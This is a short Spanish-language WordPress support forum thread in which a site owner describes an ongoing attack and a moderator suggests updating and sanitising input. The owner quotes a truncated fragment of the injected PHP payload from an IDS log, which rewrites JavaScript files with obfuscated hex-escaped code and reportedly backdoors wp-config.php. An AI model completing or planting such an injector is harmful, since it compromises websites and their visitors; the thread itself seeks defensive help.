• Hola! No se si este tema va a acá, creería que si, pero les comento.
    Mi sitio está siendo atacado desde varios IPs, tengo instalado Mute Screamer (es un IDS), Scanner Exploit, IP Ban y me muestra esto:

    POST.HOST: set_time_limit(0); function modify($fname){ $tmp = file_get_contents($fname); $pos = strpos($tmp,'var _0xa687=["\x74\x6F\x4C'); if ($pos === false){ $code = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F"... y sigue.

    Lo que hacen es ejecutarme eso, no se cómo, y me infectan todos los JS. El virus también me modifica el wp-config.php abriendo una puerta de acceso. Yo hice un script para limpiarlo pero sería conveniente eliminar el problema de raíz.

    Alguien tuvo un problema similar?
    Gracias de antemano.

Viendo 1 respuesta (de un total de 1)
  • Moderador erchache2000

    (@erchache2000)

    Pues sí, tiene toda la pinta de que están intentando inyectar código.

    Actualiza el software de tu wordpress y sanitiza todo el código php/html que hayas metido a mano.

    Es decir filtrar los post para que no puedan inyectar código del estilo «\x73\x63\x5F\x63\x6F

Viendo 1 respuesta (de un total de 1)
  • El debate ‘Ataque a mi WordPress’ está cerrado a nuevas respuestas.